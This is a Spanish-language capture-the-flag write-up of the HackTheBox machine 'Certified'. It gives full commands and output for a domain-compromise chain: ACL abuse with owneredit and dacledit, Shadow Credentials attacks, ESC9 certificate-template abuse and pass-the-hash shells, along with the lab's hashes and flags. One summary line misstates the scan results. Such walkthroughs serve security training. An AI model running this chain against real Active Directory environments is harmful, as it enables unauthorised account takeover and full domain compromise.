Certified provee credenciales de un primer usuario. Con estas, explotamos WriteOwner y GenericWrite para acceder a un segundo usuario. Este ultimo tiene permisos GenericAll sobre otro usuario. A traves de este, conseguimos acceder a un tercer usuario. Con este ultimo identificamos ESC9 y, tras la explotacion logramos aceder como administrator.
| Nombre |
Certified  |
| OS |
Windows  |
| Puntos |
30 |
| Dificultad |
Medium |
| Fecha de Salida |
2024-11-02 |
| IP |
10.10.11.41 |
| Maker |
ruycr4ft |
|
Rated
|
{
"type": "bar",
"data": {
"labels": ["Cake", "VeryEasy", "Easy", "TooEasy", "Medium", "BitHard","Hard","TooHard","ExHard","BrainFuck"],
"datasets": [{
"label": "User Rated Difficulty",
"data": [132, 101, 571, 822, 1060, 598, 347, 67, 24, 26],
"backgroundColor": ["#9fef00","#9fef00","#9fef00", "#ffaf00","#ffaf00","#ffaf00","#ffaf00", "#ff3e3e","#ff3e3e","#ff3e3e"]
}]
},
"options": {
"scales": {
"xAxes": [{"display": false}],
"yAxes": [{"display": false}]
},
"legend": {"labels": {"fontColor": "white"}},
"responsive": true
}
}
|
As is common in real life Windows pentests, you will start this box with credentials for the following account: judith.mader / judith09
Recon
nmap
nmap muestra multiples puertos abiertos: http (80) y ssh (22).
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
|
# Nmap 7.95 scan initiated Sun Feb 2 00:30:12 2025 as: /usr/lib/nmap/nmap --privileged -p53,88,135,139,389,445,464,593,636,3268,3269,9389,49666,49668,49673,49674,49681,49716,49741,49774 -sV -sC -oN nmap_scan 10.10.11.41
Nmap scan report for 10.10.11.41
Host is up (0.088s latency).
PORT STATE SERVICE VERSION
53/tcp open domain (generic dns response: SERVFAIL)
| fingerprint-strings:
| DNS-SD-TCP:
| _services
| _dns-sd
| _udp
|_ local
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-02 12:30:22Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2025-02-02T12:31:53+00:00; +7h00m03s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-02-02T12:31:52+00:00; +7h00m04s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-02-02T12:31:52+00:00; +7h00m04s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-02-02T12:31:52+00:00; +7h00m04s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
49716/tcp open msrpc Microsoft Windows RPC
49741/tcp open msrpc Microsoft Windows RPC
49774/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.95%I=7%D=2/2%Time=679F02F9%P=x86_64-pc-linux-gnu%r(DNS-S
SF:D-TCP,30,"\0\.\0\0\x80\x82\0\x01\0\0\0\0\0\0\t_services\x07_dns-sd\x04_
SF:udp\x05local\0\0\x0c\0\x01");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h00m03s, deviation: 0s, median: 7h00m03s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-02-02T12:31:12
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 2 00:31:50 2025 -- 1 IP address (1 host up) scanned in 97.89 seconds
|
SMB & LDAP
crackmapexec muestra que las credenciales tienen acceso a SMB.
1
2
3
4
5
6
7
8
9
10
11
12
|
❯ crackmapexec smb 10.10.11.41 -u "judith.mader" -p "judith09" --shares
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\judith.mader:judith09
SMB 10.10.11.41 445 DC01 [+] Enumerated shares
SMB 10.10.11.41 445 DC01 Share Permissions Remark
SMB 10.10.11.41 445 DC01 ----- ----------- ------
SMB 10.10.11.41 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.41 445 DC01 C$ Default share
SMB 10.10.11.41 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.41 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.41 445 DC01 SYSVOL READ Logon server share
❯
|
De igual forma por el servicio LDAP.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
❯ ldapsearch -H ldap://certified.htb -D 'judith.mader@certified.htb' -w judith09 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=certified,DC=htb
namingcontexts: CN=Configuration,DC=certified,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=certified,DC=htb
namingcontexts: DC=DomainDnsZones,DC=certified,DC=htb
namingcontexts: DC=ForestDnsZones,DC=certified,DC=htb
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
❯
|
Bloodhound
Ejecutamos bloodhound-python con las credenciales de judith especificando la compresion en zip para importarlo a bloodhound.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
❯ bloodhound-python -u judith.mader -p "judith09" -ns 10.10.11.41 -d certified.htb -c all --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: certified.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.certified.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 10 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.certified.htb
INFO: Done in 00M 15S
INFO: Compressing output into 20250204061108_bloodhound.zip
❯
|
Path to Admin
‘Shortest path to here from Owned’ de bloodhound sugiere un camino a seguir para llegar a Administrator, primero obteniendo acceso como management_svc.
Judith tiene permisos “WriteOwner” sobre el grupo Management y este ultimo “GenericWrite” sobre management_svc, con estos dos permisos podriamos llegar a este ultimo usuario.
User - management_svc
Ownership & FullControll on Management
Ejecutamos owneredit y dacledit para obtener acceso sobre el grupo Management.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
# Granting Ownership
❯ impacket-owneredit -action write -new-owner 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'CERTIFIED/judith.mader:judith09' -dc-ip 10.10.11.41 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Current owner information below
[*] - SID: S-1-5-21-729746778-2675978091-3820388244-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=certified,DC=htb
[*] OwnerSid modified successfully!
❯
# Granting Full Control
❯ impacket-dacledit -action write -rights WriteMembers -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'CERTIFIED/judith.mader:judith09' -dc-ip 10.10.11.41 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20250204-064047.bak
[*] DACL modified successfully!
❯
|
Al tener control sobre el grupo podemos agregar a Judith a este, verificamos los usuarios dentro del grupo.
1
2
3
4
5
6
7
8
9
10
|
# Add judith to Management group
# net rpc group addmem "Management" "judith.mader" -U 'CERTIFIED.HTB/judith.mader%judith09' -S 10.10.11.41
# Check members of Management group
# net rpc group MEMBERS "Management" -U 'CERTIFIED.HTB/judith.mader%judith09' -S 10.10.11.41
❯ net rpc group addmem "Management" "judith.mader" -U 'CERTIFIED.HTB/judith.mader%judith09' -S 10.10.11.41
❯ net rpc group MEMBERS "Management" -U 'CERTIFIED.HTB/judith.mader%judith09' -S 10.10.11.41
CERTIFIED\judith.mader
CERTIFIED\management_svc
❯
|
Shadow Credentials
Bloodhound recomienda Targeted Kerberoast y Shadow Credentials. Utilizamos pywhisker y solucionamos un error en el modulo de OpenSSL.crypto tras instalar la version de openssl 24 y crypthography 41.
Ejecutamos pywhisker el cual muestra el atributo msDS-KeyCredentialLink vacio, nuevamente realizamos la ejecucion esta vez con la accion add, se muestra como exitosa, tambien se solicita un certificado que puede ser utilizado para obtener un TGT con la herramienta PKINITtools.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
|
# action: list
❯ python pywhisker.py -d "CERTIFIED.HTB" -u "judith.mader" -p "judith09" --target "management_svc" --action "list"
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Attribute msDS-KeyCredentialLink is either empty or user does not have read permissions on that attribute
❯
# action: add
❯ python pywhisker.py -d "CERTIFIED.HTB" -u "judith.mader" -p "judith09" --target "management_svc" --action "add"
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: bdb48b22-e092-48a0-876b-936d641db4b6
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: Mu21Nexs.pfx
[*] Must be used with password: PHbokfyjxLWtcP4yNyQe
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
❯
|
Solicitamos el ticket con gettgtpkinit pasando el certificado y contrasena anteriormente generado.
1
2
3
4
5
6
7
8
9
10
11
12
13
|
# TGT request
❯ python ../tools/PKINITtools/gettgtpkinit.py -cert-pfx Mu21Nexs.pfx -pfx-pass PHbokfyjxLWtcP4yNyQe certified.htb/management_svc Mu21Nexs.ccache
2025-02-04 07:11:59,908 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-02-04 07:11:59,918 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2025-02-04 07:12:15,347 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-02-04 07:12:15,348 minikerberos INFO a9e68b539ecf4b8597c356c51d1e8bd9b16f4d2cb6b546e299eabf2ccda95a52
INFO:minikerberos:a9e68b539ecf4b8597c356c51d1e8bd9b16f4d2cb6b546e299eabf2ccda95a52
2025-02-04 07:12:15,349 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
❯
|
getnthash nos permite obtener el nt hash de management_svc especificando el ticket.
1
2
3
4
5
6
7
8
9
|
# Recover the NT Hash
❯ export KRB5CCNAME=Mu21Nexs.ccache; python3 ../tools/PKINITtools/getnthash.py -key a9e68b539ecf4b8597c356c51d1e8bd9b16f4d2cb6b546e299eabf2ccda95a52 certified.htb/management_svc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
a091c1832bcdd4677c28b5a6a1295584
❯
|
TGT & NT Hash - Certipy
Podemos obtener tambien el ticket y el hash utilizando certipy.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
# TGT & NT Hash
❯ certipy-ad cert -export -pfx Mu21Nexs.pfx -password "PHbokfyjxLWtcP4yNyQe" -out unprotected_pfx.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Writing PFX to 'unprotected_pfx.pfx'
❯ certipy-ad auth -pfx unprotected_pfx.pfx -username "management_svc" -domain "CERTIFIED.HTB"
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[!] Could not find identification in the provided certificate
[*] Using principal: management_svc@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Got hash for 'management_svc@certified.htb': aad3b435b51404eeaad3b435b51404ee:a091c1832bcdd4677c28b5a6a1295584
❯
|
Shadow Credentials - Certipy
De igual forma podemos realizar Shadow Credentials con Certipy, obtenemos directamente el TGT y nt hash de management_svc.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
# auto shadow credentials - certipy
❯ certipy-ad shadow auto -u judith.mader@certified.htb -p judith09 -account management_svc
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'management_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '97ceda79-c6f7-d035-510c-84dbe64975a2'
[*] Adding Key Credential with device ID '97ceda79-c6f7-d035-510c-84dbe64975a2' to the Key Credentials for 'management_svc'
[*] Successfully added Key Credential with device ID '97ceda79-c6f7-d035-510c-84dbe64975a2' to the Key Credentials for 'management_svc'
[*] Authenticating as 'management_svc' with the certificate
[*] Using principal: management_svc@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Restoring the old Key Credentials for 'management_svc'
[*] Successfully restored the old Key Credentials for 'management_svc'
[*] NT hash for 'management_svc': a091c1832bcdd4677c28b5a6a1295584
❯
|
Shell
Utilizamos el hash en el servicio winrm logrando acceder a la maquina y obtener la flag user.txt.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
|
❯ evil-winrm -i certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\management_svc\Documents> whoami
certified\management_svc
*Evil-WinRM* PS C:\Users\management_svc\Documents> dir ../Desktop
Directory: C:\Users\management_svc\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/1/2025 8:17 AM 34 user.txt
*Evil-WinRM* PS C:\Users\management_svc\Documents> cat ../Desktop/user.txt
4ce4958305057e0df7e34a30d7c9b4e0
*Evil-WinRM* PS C:\Users\management_svc\Documents>
|
User - operator_ca
Bloodhound muestra y sugiere DCsync sobre Active Directory, pero management_svc no pertenece al grupo de Domain Admins.
El unico usuario accesible es ca_operator, management_svc tiene permisos GenericAll sobre este.
Shadow Credentials
Bloodhound sugiere shadow credentials, utilizamos certipy para ejecutar este ataque logrando obtener el hash de este usuario.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
|
❯ certipy-ad shadow auto -u management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -account ca_operator
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_operator'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '7895b679-029c-6a52-eb80-d38aaa80b34b'
[*] Adding Key Credential with device ID '7895b679-029c-6a52-eb80-d38aaa80b34b' to the Key Credentials for 'ca_operator'
[*] Successfully added Key Credential with device ID '7895b679-029c-6a52-eb80-d38aaa80b34b' to the Key Credentials for 'ca_operator'
[*] Authenticating as 'ca_operator' with the certificate
[*] Using principal: ca_operator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_operator.ccache'
[*] Trying to retrieve NT hash for 'ca_operator'
[*] Restoring the old Key Credentials for 'ca_operator'
[*] Successfully restored the old Key Credentials for 'ca_operator'
[*] NT hash for 'ca_operator': b4b86f45c6018f1b664f70805f45d8f2
❯
|
ESC9
Con el hash de ca_operator ejecutamos certipy para verificar certificados vulnerables. Observamos que CertifiedAuthentication es vulnerable a ESC9.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
|
❯ certipy-ad find -vulnerable -u ca_operator@certified.htb -hashes :b4b86f45c6018f1b664f70805f45d8f2 -dc-ip 10.10.11.41 -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'certified-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'certified-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'certified-DC01-CA' via RRP
[*] Got CA configuration for 'certified-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : certified-DC01-CA
DNS Name : DC01.certified.htb
Certificate Subject : CN=certified-DC01-CA, DC=certified, DC=htb
Certificate Serial Number : 36472F2C180FBB9B4983AD4D60CD5A9D
Certificate Validity Start : 2024-05-13 15:33:41+00:00
Certificate Validity End : 2124-05-13 15:43:41+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : CERTIFIED.HTB\Administrators
Access Rights
ManageCertificates : CERTIFIED.HTB\Administrators
CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
ManageCa : CERTIFIED.HTB\Administrators
CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
Enroll : CERTIFIED.HTB\Authenticated Users
Certificate Templates
0
Template Name : CertifiedAuthentication
Display Name : Certified Authentication
Certificate Authorities : certified-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectRequireDirectoryPath
SubjectAltRequireUpn
Enrollment Flag : NoSecurityExtension
AutoEnrollment
PublishToDs
Private Key Flag : 16842752
Extended Key Usage : Server Authentication
Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1000 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : CERTIFIED.HTB\operator ca
CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
Object Control Permissions
Owner : CERTIFIED.HTB\Administrator
Write Owner Principals : CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
CERTIFIED.HTB\Administrator
Write Dacl Principals : CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
CERTIFIED.HTB\Administrator
Write Property Principals : CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
CERTIFIED.HTB\Administrator
[!] Vulnerabilities
ESC9 : 'CERTIFIED.HTB\\operator ca' can enroll and template has no security extension
❯
|
Privesc
Para realizar la explotacion de ESC9 debemos de tener permisos GenericWrite sobre otra cuenta. En este caso se aplica ya que tenemos permisos GenericAll sobre ca_operator, y este ultimo tiene permisos sobre la plantilla del certificado vulnerable.
Teniendo el hash de ca_operator, iniciamos cambiando el userPrincipalName de ca_operator a Administrator.
1
2
3
4
5
6
7
|
❯ certipy-ad account update -u management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_operator':
userPrincipalName : Administrator
[*] Successfully updated 'ca_operator'
❯
|
Como ca_operator solicitamos un certificado a la plantilla vulnerable CertifiedAuthentication.
1
2
3
4
5
6
7
8
9
10
|
❯ certipy-ad req -u ca_operator@certified.htb -hashes b4b86f45c6018f1b664f70805f45d8f2 -ca "certified-DC01-CA" -template CertifiedAuthentication
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 4
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
❯
|
Regresamos nuevamente el valor original de userPrincipalName del usuario ca_operator.
1
2
3
4
5
6
7
|
❯ certipy-ad account update -u management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn ca_operater@certified.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_operator':
userPrincipalName : ca_operater@certified.htb
[*] Successfully updated 'ca_operator'
❯
|
Ahora con el certificado que solicitamos anteriormente intentamos obtener el hash de administrator.
1
2
3
4
5
6
7
8
9
10
|
❯ certipy-ad auth -pfx administrator.pfx -domain certified.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34
❯
|
Shell
Con el hash logramos el acceso como administrator y la flag root.txt.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
❯ evil-winrm -i certified.htb -u administrator -H 0d5b49608bbce1751f708748f67e2d34 -s .
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/2/2025 7:31 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
2e166de877e3683a84c6120a9909e6b0
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
|
Ref.
